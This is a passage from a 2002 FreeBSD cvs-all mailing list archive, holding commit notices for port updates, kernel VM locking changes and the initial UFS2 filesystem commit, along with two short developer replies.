-0700 (PDT) (envelope-from pat) Message-Id: <200206210502.g5L522D62760@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 22:02:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/mawk Makefile pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 22:02:01 PDT Modified files: lang/mawk Makefile pkg-descr Log: - Remove dead MASTER_SITES entry - add WWW to pkg-descr - add do-install target PR: 39588 Submitted by: maintainer Revision Changes Path 1.13 +4 -4 ports/lang/mawk/Makefile 1.2 +2 -0 ports/lang/mawk/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22: 4:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D583B37B403; Thu, 20 Jun 2002 22:04:56 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L54ur62992; Thu, 20 Jun 2002 22:04:56 -0700 (PDT) (envelope-from alc) Message-Id: <200206210504.g5L54ur62992@freefall.freebsd.org> From: Alan Cox Date: Thu, 20 Jun 2002 22:04:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_pager.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/20 22:04:56 PDT Modified files: sys/vm vm_pager.c Log: o Remove GIANT_REQUIRED from vm_pager_allocate() and vm_pager_deallocate(). Revision Changes Path 1.82 +0 -3 src/sys/vm/vm_pager.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22: 6:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 152B737B406; Thu, 20 Jun 2002 22:06:18 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L56Id67138; Thu, 20 Jun 2002 22:06:18 -0700 (PDT) (envelope-from pat) Message-Id: <200206210506.g5L56Id67138@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 22:06:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/p5-Tk-HistEntry Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 22:06:17 PDT Modified files: x11-toolkits/p5-Tk-HistEntry Makefile distinfo pkg-descr Log: - Update to 0.40 - Fix pkg-descr - Give maintainership to submitter PR: ports/39564 Submitted by: Erwin Lansing Revision Changes Path 1.2 +2 -2 ports/x11-toolkits/p5-Tk-HistEntry/Makefile 1.2 +1 -1 ports/x11-toolkits/p5-Tk-HistEntry/distinfo 1.2 +4 -2 ports/x11-toolkits/p5-Tk-HistEntry/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22: 9:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CB79437B403; Thu, 20 Jun 2002 22:09:20 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L59Kp67484; Thu, 20 Jun 2002 22:09:20 -0700 (PDT) (envelope-from pat) Message-Id: <200206210509.g5L59Kp67484@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 22:09:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/p5-Tk-GBARR Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 22:09:20 PDT Modified files: x11-toolkits/p5-Tk-GBARR Makefile distinfo pkg-descr Log: - Update to 2.05 - Give maintainership to submitter - Add WWW tag to descr. PR: ports/39563 Submitted by: Erwin Lansing Revision Changes Path 1.2 +2 -2 ports/x11-toolkits/p5-Tk-GBARR/Makefile 1.2 +1 -1 ports/x11-toolkits/p5-Tk-GBARR/distinfo 1.2 +2 -0 ports/x11-toolkits/p5-Tk-GBARR/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:12:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 299B337B40C; Thu, 20 Jun 2002 22:12:36 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L5CaS68322; Thu, 20 Jun 2002 22:12:36 -0700 (PDT) (envelope-from pat) Message-Id: <200206210512.g5L5CaS68322@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 22:12:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/p5-XML-LibXSLT Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 22:12:36 PDT Modified files: textproc/p5-XML-LibXSLT Makefile distinfo Log: Update to 1.50 PR: 39458 Submitted by: Matveychuk Sergey Approved by: maintainer Revision Changes Path 1.4 +1 -1 ports/textproc/p5-XML-LibXSLT/Makefile 1.3 +1 -1 ports/textproc/p5-XML-LibXSLT/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:14:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D5D0937B408; Thu, 20 Jun 2002 22:14:05 -0700 (PDT) Received: (from gshapiro@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L5E5368552; Thu, 20 Jun 2002 22:14:05 -0700 (PDT) (envelope-from gshapiro) Message-Id: <200206210514.g5L5E5368552@freefall.freebsd.org> From: Gregory Neil Shapiro Date: Thu, 20 Jun 2002 22:14:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/astro/xearth/files freebsd.committers.markers X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gshapiro 2002/06/20 22:14:05 PDT Modified files: astro/xearth/files freebsd.committers.markers Log: Correct my coordinates based on http://geocode.com/eagle.html Revision Changes Path 1.97 +1 -1 ports/astro/xearth/files/freebsd.committers.markers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:19: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 49FDB37B410; Thu, 20 Jun 2002 22:18:59 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L5IxF68919; Thu, 20 Jun 2002 22:18:59 -0700 (PDT) (envelope-from tjr) Message-Id: <200206210518.g5L5IxF68919@freefall.freebsd.org> From: "Tim J. Robbins" Date: Thu, 20 Jun 2002 22:18:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/uniq uniq.1 uniq.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/20 22:18:59 PDT Modified files: (Branch: RELENG_4) usr.bin/uniq uniq.1 uniq.c Log: MFC: An input filename of "-" can be used to mean standard input, WARNS/style changes. Revision Changes Path 1.5.2.4 +13 -2 src/usr.bin/uniq/uniq.1 1.11.2.2 +18 -28 src/usr.bin/uniq/uniq.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:26:43 2002 Delivered-To: cvs-all@freebsd.org Received: from iguana.icir.org (iguana.icir.org [192.150.187.36]) by hub.freebsd.org (Postfix) with ESMTP id 9497737B419; Thu, 20 Jun 2002 22:26:38 -0700 (PDT) Received: (from rizzo@localhost) by iguana.icir.org (8.11.6/8.11.3) id g5L5Qbu76350; Thu, 20 Jun 2002 22:26:37 -0700 (PDT) (envelope-from rizzo) Date: Thu, 20 Jun 2002 22:26:37 -0700 From: Luigi Rizzo To: Julian Elischer Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/sys mbuf.h Message-ID: <20020620222636.B73450@iguana.icir.org> References: <200206202129.g5KLTu577564@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from julian@elischer.org on Thu, Jun 20, 2002 at 03:58:10PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Jun 20, 2002 at 03:58:10PM -0700, Julian Elischer wrote: > Re: MFC.. > I presume that this method will not explode > binary drivers.. absolutely, don't worry... and no changes to mbuf structs etc. cheers luigi > (i.e. alll normal data appears in the normal places in outgoing > packets) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:29:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C11CE37B403; Thu, 20 Jun 2002 22:29:40 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L5Te469940; Thu, 20 Jun 2002 22:29:40 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210529.g5L5Te469940@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 22:29:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/net bpf.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 22:29:40 PDT Modified files: sys/net bpf.h Log: Update for libpcap 0.7.1 Originally-committed-to-wrong-repository by: fenner Revision Changes Path 1.26 +46 -14 src/sys/net/bpf.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:46:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 410A237B410; Thu, 20 Jun 2002 22:46:47 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L5klh72148; Thu, 20 Jun 2002 22:46:47 -0700 (PDT) (envelope-from pat) Message-Id: <200206210546.g5L5klh72148@freefall.freebsd.org> From: Patrick Li Date: Thu, 20 Jun 2002 22:46:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/waimea Makefile distinfo ports/x11-wm/waimea/files patch-src::EventHandler.cc patch-src::EventHandler.hh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/20 22:46:47 PDT Modified files: x11-wm/waimea Makefile distinfo Added files: x11-wm/waimea/files patch-src::EventHandler.cc patch-src::EventHandler.hh Log: - Update to 0.3.3 - Add patches to use gettimeofday(2) so it will not have to link with libcompat PR: 39568 Submitted by: maintainer Revision Changes Path 1.2 +1 -2 ports/x11-wm/waimea/Makefile 1.2 +1 -1 ports/x11-wm/waimea/distinfo 1.1 +61 -0 ports/x11-wm/waimea/files/patch-src::EventHandler.cc (new) 1.1 +20 -0 ports/x11-wm/waimea/files/patch-src::EventHandler.hh (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 22:47:39 2002 Delivered-To: cvs-all@freebsd.org Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by hub.freebsd.org (Postfix) with ESMTP id B54CC37B40C; Thu, 20 Jun 2002 22:47:26 -0700 (PDT) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g5L5lOOa015389; Fri, 21 Jun 2002 01:47:24 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g5L5lOu4015386; Fri, 21 Jun 2002 01:47:24 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Fri, 21 Jun 2002 01:47:24 -0400 (EDT) From: Trevor Johnson To: "Andrey A. Chernov" Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: ports/www/apache13 Makefile ports/www/apache13/files patch-ab In-Reply-To: <200206200135.g5K1Z5m49335@freefall.freebsd.org> Message-ID: <20020621014612.Q15105-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > ache 2002/06/19 18:35:05 PDT > > Modified files: > www/apache13 Makefile > www/apache13/files patch-ab > Log: > Don't remove data.default & cgi-bin.default on install > > Revision Changes Path > 1.120 +2 -1 ports/www/apache13/Makefile > 1.23 +5 -7 ports/www/apache13/files/patch-ab PR 39575 can be closed, right? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=39575 -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 23: 3:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 02E6837B404; Thu, 20 Jun 2002 23:03:48 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L63lx74120; Thu, 20 Jun 2002 23:03:47 -0700 (PDT) (envelope-from alc) Message-Id: <200206210603.g5L63lx74120@freefall.freebsd.org> From: Alan Cox Date: Thu, 20 Jun 2002 23:03:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_map.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/20 23:03:47 PDT Modified files: sys/vm vm_map.c Log: o Remove GIANT_REQUIRED from vm_map_stack(). Revision Changes Path 1.256 +0 -2 src/sys/vm/vm_map.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 23:18:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B881A37B405; Thu, 20 Jun 2002 23:18:05 -0700 (PDT) Received: (from mckusick@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L6I5w81565; Thu, 20 Jun 2002 23:18:05 -0700 (PDT) (envelope-from mckusick) Message-Id: <200206210618.g5L6I5w81565@freefall.freebsd.org> From: Kirk McKusick Date: Thu, 20 Jun 2002 23:18:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/include/protocols dumprestore.h src/lib/libstand ufs.c src/release/picobsd/build write_mfs_in_kernel.c src/sbin Makefile src/sbin/badsect badsect.c src/sbin/clri clri.c src/sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mckusick 2002/06/20 23:18:05 PDT Modified files: include/protocols dumprestore.h lib/libstand ufs.c release/picobsd/build write_mfs_in_kernel.c sbin Makefile sbin/badsect badsect.c sbin/clri clri.c sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c sbin/dumpfs dumpfs.c sbin/fsck_ffs dir.c fsck.h fsutil.c inode.c main.c pass1.c pass1b.c pass2.c pass4.c pass5.c setup.c sbin/fsdb fsdb.c fsdb.h fsdbutil.c sbin/fsirand fsirand.c sbin/growfs growfs.c sbin/newfs mkfs.c newfs.8 newfs.c newfs.h sbin/quotacheck quotacheck.c sbin/restore dirs.c main.c restore.c restore.h tape.c sbin/tunefs tunefs.8 tunefs.c sys/boot/common ufsread.c sys/boot/i386 Makefile sys/boot/i386/boot2 Makefile boot2.c sys/boot/i386/libi386 Makefile sys/boot/i386/loader Makefile sys/i386 Makefile sys/kern subr_disklabel.c subr_diskslice.c vfs_bio.c vfs_cluster.c vfs_syscalls.c vfs_vnops.c sys/sys stat.h types.h vnode.h sys/ufs/ffs ffs_alloc.c ffs_balloc.c ffs_extern.h ffs_inode.c ffs_snapshot.c ffs_softdep.c ffs_softdep_stub.c ffs_subr.c ffs_tables.c ffs_vfsops.c ffs_vnops.c fs.h softdep.h sys/ufs/ufs dinode.h inode.h quota.h ufs_acl.c ufs_bmap.c ufs_extattr.c ufs_extern.h ufs_inode.c ufs_lookup.c ufs_quota.c ufs_readwrite.c ufs_vnops.c ufsmount.h usr.bin/fstat fstat.c usr.sbin/quot quot.c Log: This commit adds basic support for the UFS2 filesystem. The UFS2 filesystem expands the inode to 256 bytes to make space for 64-bit block pointers. It also adds a file-creation time field, an ability to use jumbo blocks per inode to allow extent like pointer density, and space for extended attributes (up to twice the filesystem block size worth of attributes, e.g., on a 16K filesystem, there is space for 32K of attributes). UFS2 fully supports and runs existing UFS1 filesystems. New filesystems built using newfs can be built in either UFS1 or UFS2 format using the -O option. In this commit UFS1 is the default format, so if you want to build UFS2 format filesystems, you must specify -O 2. This default will be changed to UFS2 when UFS2 proves itself to be stable. In this commit the boot code for reading UFS2 filesystems is not compiled (see /sys/boot/common/ufsread.c) as there is insufficient space in the boot block. Once the size of the boot block is increased, this code can be defined. Things to note: the definition of SBSIZE has changed to SBLOCKSIZE. The header file must be included before so as to get the definitions of ufs2_daddr_t and ufs_lbn_t. Still TODO: Verify that the first level bootstraps work for all the architectures. Convert the utility ffsinfo to understand UFS2 and test growfs. Add support for the extended attribute storage. Update soft updates to ensure integrity of extended attribute storage. Switch the current extended attribute interfaces to use the extended attribute storage. Add the extent like functionality (framework is there, but is currently never used). Sponsored by: DARPA & NAI Labs. Reviewed by: Poul-Henning Kamp Revision Changes Path 1.9 +39 -8 src/include/protocols/dumprestore.h 1.12 +90 -95 src/lib/libstand/ufs.c 1.10 +23 -5 src/release/picobsd/build/write_mfs_in_kernel.c 1.107 +0 -1 src/sbin/Makefile 1.14 +21 -3 src/sbin/badsect/badsect.c 1.7 +46 -21 src/sbin/clri/clri.c 1.17 +8 -10 src/sbin/dump/dump.h 1.12 +4 -4 src/sbin/dump/itime.c 1.37 +28 -25 src/sbin/dump/main.c 1.21 +2 -0 src/sbin/dump/optr.c 1.20 +11 -11 src/sbin/dump/tape.c 1.19 +197 -73 src/sbin/dump/traverse.c 1.18 +128 -106 src/sbin/dumpfs/dumpfs.c 1.23 +44 -42 src/sbin/fsck_ffs/dir.c 1.25 +63 -32 src/sbin/fsck_ffs/fsck.h 1.14 +15 -13 src/sbin/fsck_ffs/fsutil.c 1.31 +103 -86 src/sbin/fsck_ffs/inode.c 1.33 +12 -8 src/sbin/fsck_ffs/main.c 1.29 +72 -53 src/sbin/fsck_ffs/pass1.c 1.11 +2 -2 src/sbin/fsck_ffs/pass1b.c 1.18 +22 -16 src/sbin/fsck_ffs/pass2.c 1.11 +3 -3 src/sbin/fsck_ffs/pass4.c 1.28 +68 -81 src/sbin/fsck_ffs/pass5.c 1.33 +73 -38 src/sbin/fsck_ffs/setup.c 1.26 +48 -24 src/sbin/fsdb/fsdb.c 1.9 +5 -5 src/sbin/fsdb/fsdb.h 1.17 +64 -39 src/sbin/fsdb/fsdbutil.c 1.10 +70 -47 src/sbin/fsirand/fsirand.c 1.9 +316 -395 src/sbin/growfs/growfs.c 1.57 +373 -440 src/sbin/newfs/mkfs.c 1.52 +21 -17 src/sbin/newfs/newfs.8 1.62 +46 -56 src/sbin/newfs/newfs.c 1.7 +17 -5 src/sbin/newfs/newfs.h 1.16 +59 -21 src/sbin/quotacheck/quotacheck.c 1.22 +46 -68 src/sbin/restore/dirs.c 1.16 +2 -5 src/sbin/restore/main.c 1.12 +2 -2 src/sbin/restore/restore.c 1.4 +12 -5 src/sbin/restore/restore.h 1.35 +120 -163 src/sbin/restore/tape.c 1.21 +17 -24 src/sbin/tunefs/tunefs.8 1.24 +31 -33 src/sbin/tunefs/tunefs.c 1.4 +174 -41 src/sys/boot/common/ufsread.c 1.17 +1 -1 src/sys/boot/i386/Makefile 1.30 +1 -1 src/sys/boot/i386/boot2/Makefile 1.43 +39 -45 src/sys/boot/i386/boot2/boot2.c 1.26 +7 -4 src/sys/boot/i386/libi386/Makefile 1.58 +1 -1 src/sys/boot/i386/loader/Makefile 1.11 +1 -0 src/sys/i386/Makefile 1.66 +6 -5 src/sys/kern/subr_disklabel.c 1.105 +5 -5 src/sys/kern/subr_diskslice.c 1.312 +9 -8 src/sys/kern/vfs_bio.c 1.120 +7 -8 src/sys/kern/vfs_cluster.c 1.260 +2 -2 src/sys/kern/vfs_syscalls.c 1.147 +2 -2 src/sys/kern/vfs_vnops.c 1.25 +4 -2 src/sys/sys/stat.h 1.66 +0 -2 src/sys/sys/types.h 1.180 +1 -0 src/sys/sys/vnode.h 1.93 +452 -231 src/sys/ufs/ffs/ffs_alloc.c 1.35 +399 -43 src/sys/ufs/ffs/ffs_balloc.c 1.48 +21 -17 src/sys/ufs/ffs/ffs_extern.h 1.79 +82 -56 src/sys/ufs/ffs/ffs_inode.c 1.36 +474 -137 src/sys/ufs/ffs/ffs_snapshot.c 1.116 +351 -104 src/sys/ufs/ffs/ffs_softdep.c 1.22 +6 -6 src/sys/ufs/ffs/ffs_softdep_stub.c 1.31 +60 -11 src/sys/ufs/ffs/ffs_subr.c 1.9 +1 -0 src/sys/ufs/ffs/ffs_tables.c 1.183 +162 -115 src/sys/ufs/ffs/ffs_vfsops.c 1.84 +1 -1 src/sys/ufs/ffs/ffs_vnops.c 1.33 +122 -149 src/sys/ufs/ffs/fs.h 1.15 +23 -15 src/sys/ufs/ffs/softdep.h 1.10 +89 -46 src/sys/ufs/ufs/dinode.h 1.38 +39 -29 src/sys/ufs/ufs/inode.h 1.21 +4 -4 src/sys/ufs/ufs/quota.h 1.15 +3 -0 src/sys/ufs/ufs/ufs_acl.c 1.53 +50 -35 src/sys/ufs/ufs/ufs_bmap.c 1.52 +2 -2 src/sys/ufs/ufs/ufs_extattr.c 1.42 +5 -4 src/sys/ufs/ufs/ufs_extern.h 1.43 +11 -5 src/sys/ufs/ufs/ufs_inode.c 1.61 +13 -7 src/sys/ufs/ufs/ufs_lookup.c 1.56 +13 -12 src/sys/ufs/ufs/ufs_quota.c 1.91 +8 -6 src/sys/ufs/ufs/ufs_readwrite.c 1.196 +99 -34 src/sys/ufs/ufs/ufs_vnops.c 1.26 +7 -2 src/sys/ufs/ufs/ufsmount.h 1.42 +4 -0 src/usr.bin/fstat/fstat.c 1.18 +87 -53 src/usr.sbin/quot/quot.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 23:43:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1AE8937B40C; Thu, 20 Jun 2002 23:43:49 -0700 (PDT) Received: (from ru@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L6hn886962; Thu, 20 Jun 2002 23:43:49 -0700 (PDT) (envelope-from ru) Message-Id: <200206210643.g5L6hn886962@freefall.freebsd.org> From: Ruslan Ermilov Date: Thu, 20 Jun 2002 23:43:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/which which.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ru 2002/06/20 23:43:48 PDT Modified files: usr.bin/which which.1 Log: Give a C rewriter the necessary credit. Requested by: Daniel Papasian Revision Changes Path 1.23 +9 -3 src/usr.bin/which/which.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 23:50:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AF24F37B40B; Thu, 20 Jun 2002 23:50:24 -0700 (PDT) Received: (from ru@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L6oOE88870; Thu, 20 Jun 2002 23:50:24 -0700 (PDT) (envelope-from ru) Message-Id: <200206210650.g5L6oOE88870@freefall.freebsd.org> From: Ruslan Ermilov Date: Thu, 20 Jun 2002 23:50:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/share/man/man4 vinum.4 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ru 2002/06/20 23:50:21 PDT Modified files: share/man/man4 vinum.4 Log: A gross patch to tidy up the formatting. Not objected to by: grog Revision Changes Path 1.44 +402 -293 src/share/man/man4/vinum.4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 23:58:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CD61537B410; Thu, 20 Jun 2002 23:58:52 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L6wqv91422; Thu, 20 Jun 2002 23:58:52 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206210658.g5L6wqv91422@freefall.freebsd.org> From: Joseph Koshy Date: Thu, 20 Jun 2002 23:58:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/emulators/spim Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/20 23:58:52 PDT Modified files: emulators/spim Makefile distinfo Log: Update to version 6.4. Revision Changes Path 1.20 +4 -5 ports/emulators/spim/Makefile 1.5 +1 -1 ports/emulators/spim/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 0: 8:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7014637B404; Fri, 21 Jun 2002 00:08:34 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L78Yu98512; Fri, 21 Jun 2002 00:08:34 